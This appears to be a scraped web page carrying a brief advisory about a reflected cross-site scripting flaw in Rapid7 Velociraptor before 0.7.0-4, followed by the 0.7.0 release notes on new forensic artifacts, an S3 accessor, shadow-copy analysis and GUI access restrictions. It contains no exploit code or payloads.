8.  Essential Insights on Google Cloud Backup and Disaster Recovery Service

Google Launches Verification Badges for Security Tested VPN Apps

Rapid7 Velociraptor versions prior to 0.7.0-4 suffer from a reflected cross site scripting vulnerability. This vulnerability allows attackers to inject JS into the error path, potentially leading to unauthorized execution of scripts within a user's web browser. This vulnerability is fixed in version 0.7.0-04 and a patch is available to download. Patches are also available for version 0.6.9 (0.6.9-1).



This is the next point release for Velociraptor - Digging deeper!

Detailed release notes are posted at https://docs.velociraptor.app/blog/2023/2023-07-27-release-notes-0.7.0/

**GUI improvements****Enhanced client search**

In this release the client index was rewritten to store all client  
records in a single snapshot file, while managing this file in memory. This approach allows client searching to be extremely quick even for large numbers of clients well over 100k.

**Paged table in Flows List**

In this release the GUI was updated to include a paged table (with suitable filtering and sorting capabilities) so all collections can be  
accessed.

**VQL Plugins and artifacts****Chrome artifacts**

Added a leveldb parser and artifacts around Chrome Session Storage. This allows to analyse data that is stored by Chrome locally  
by various web apps.

**Lnk forensics**

This release added a more comprehensive Lnk parser covering off on all known Lnk file features. You can access the Lnk file analysis using  
the \`Windows.Forensics.Lnk artifact.

**Direct S3 accessor**

In this release Velociraptor adds an S3 accessor. This allows plugins to directly operate on S3 buckets. In particular the glob() plugin can  
be used to query bucket contents and read files from various buckets.

**Volume Shadow Copies analysis**

In the 0.7.0 release, Velociraptor adds the ntfs_vss accessor. This accessor automatically considers different snapshots and deduplicates  
files that are identical in different snapshots. This makes it much easier to incorporate VSS analysis into your artifacts.

**The SQLiteHunter project**

This release incorporates the SQLiteHunter artifact. A one stop shop for finding and analyzing SQLite files such as browser artifacts and  
OS internal files.

**Server security improvements**

In the 0.7.0 release, Velociraptor offers the GUI.allowed_cidr option. If specified, the list of CIDR addresses will specify the  
source IP acceptable to the server for connections to the GUI application (for example 192.168.1.0/24).

This filtering only applies to the GUI and forms an additional layer of security protecting the GUI application (in addition to the usual  
authentication methods).

**Conclusions**

There are many more new features and bug fixes in the latest release. Please help our community by testing this release and providing feedback through the GitHub issue board or on our discord channel

**Notes**

MacOS Binaries are now signed. You can verify the signature using the codesign utility

    codesign -d -vvv ./velociraptor-v0.7.0-darwin-amd64
    

If you see the error version GLIBC_2.33 not found  when running Velociraptor on your system, upgrade to 0.7.0-2 or the musl build. The 0.7.0 release was built on Ubuntu 22.04. A 0.7.0-2 release was now made built on Ubuntu 20.04

Release 0.7.0-3 is a bugfix release primarily for issue #2955 . If you are experiencing this issue (many duplicate clients) please test upgrading the clients to 0.7.0-3. This release also adds the ability for the writeback file to be stored in the registry instead of the filesystem on windows - simply modify the writeback_windows value in the config file to something that starts with HKLM (for example HKLM\SOFTWARE\Velocidex\Velociraptor ) this should improve stability in writing the writeback on the client and prevent potential writeback file corruptions which may have previously lead to clients recreating the writeback file with a new client id.

**NOTE: Please upgrade servers to 0.7.0-4 address CVE-2023-5950**

We are very grateful to **Mathias Kujala** for reporting this issue. More information at https://docs.velociraptor.app//announcements/2023-cves/

Tag

#chrome